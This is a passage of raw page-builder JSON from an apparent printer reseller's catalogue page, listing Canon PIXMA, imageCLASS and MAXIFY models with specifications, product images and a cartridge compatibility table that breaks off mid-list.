Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 